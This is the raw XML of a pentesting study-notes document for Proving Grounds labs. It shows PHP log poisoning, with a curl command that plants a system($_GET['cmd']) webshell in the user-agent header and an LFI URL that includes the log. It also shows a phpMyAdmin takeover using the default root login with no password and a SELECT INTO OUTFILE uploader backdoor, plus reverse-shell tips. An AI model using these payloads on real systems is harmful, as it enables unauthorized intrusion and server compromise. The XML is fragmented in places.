        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a reflection of MY user-agent. I have control of that, is this useful? Like when we poison a log file for php code execution, can I poison this? I am genuinely am not sure but I get a little tingly when I see user controlled information reflected by a PHP page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">According to chatGPT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can poison it if you get LFI and if user-agent gets put in the logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the application logs the user-agent (common in access logs), and you inject PHP code like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then if you later find a Local File Inclusion (LFI) vulnerability, and can include the log file (e.g., /var/log/apache2/access.log or C:\xampp\apache\logs\access.log), you may execute the PHP code you planted in the log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An example of how to do it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000460">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://target/ -A "&lt;?php system($_GET['cmd']); ?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-A stands for Agent and it replaces the original agent </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000462">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/vuln.php?page=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/logfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;cmd=whoami</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_djllwyc71zuj" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading PHP source code to understand how file upload works</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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId77">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mzeeav</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we got a zip file with the PHP source, code, and we had to read and understand upload.php which the upload page. We had to understand in order to find out how to upload a web/reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="879"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78">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 much longer writeup but it explains it better</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hyperlink r:id="rId79">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zipper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice also reads PHP course code for an upload.php</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E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ombpedlpt1b0" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpMyAdmin</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default creds:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000471">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:[no password]</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8r920uvug7tr" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get reverse shell from phpMyAdmin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000474">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId80">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Squid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, after logging into phpMyAdmin as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:[no password]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we found an exploit to get a reverse shell by using the SQL feature in the phpMyAdmin GUI</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will create a new file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uploader.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the root web directory that allows us to upload a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000477">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the SQL Tab and insert this code (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> github page). We found this github page by searching "get shell from phpMyAdmin" on google:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000478">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000479">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;?php echo \'&lt;form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"&gt;\';echo \'&lt;input type=\"file\" name=\"file\" size=\"50\"&gt;&lt;input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"&gt;&lt;/form&gt;\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'&lt;b&gt;Upload Done.&lt;b&gt;&lt;br&gt;&lt;br&gt;\'; }else { echo \'&lt;b&gt;Upload Failed.&lt;/b&gt;&lt;br&gt;&lt;br&gt;\'; }}?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO OUTFILE 'C:/wamp/www/uploader.php';</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4357688" cy="2060125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="224" name="image236.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image236.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4357688" cy="2060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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the 'Go' button and we are set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3643313" cy="519639"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="63"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3643313" cy="5196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0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then browse to the newly created php file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploader.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000481">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3765916" cy="1110462"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2"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3765916" cy="11104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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can upload the shell of our choice.</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Mine is the Ivan Sincek</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000484">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="847"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP Ivan Sincek shell works well for Windows!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000485">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3245518" cy="1976438"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="558" name="image540.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image540.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="324551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240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy it to a file and upload it too </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploader.php</w:t>
      </w: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Then we need to set up a listener. Be sure to use rlwrap to preserve arrow functionality upon connection. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I like to use port 135 on Windows because I know it allows egress traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Egress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">traffic refers to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">outbound network traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — meaning traffic that leaves a system or network and goes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">out to another network</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as the internet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000489">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dv1z0dhcqsts" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General:</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default credentials:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root : [no password]</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The</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> default path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for phpmyadmin is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/phpmyadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so check that if you already got a foothold into web server</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Then check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config-db.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it exists, or any other</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> config files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> because in "funbox-easyenum" PG play, we found credentials like that</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If you want a walkthrough on how to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpMyAdmin GUI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">after getting past the login page, then look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</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rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get version number of phpMyAdmin:</w:t>
      </w:r>
    </w:p>
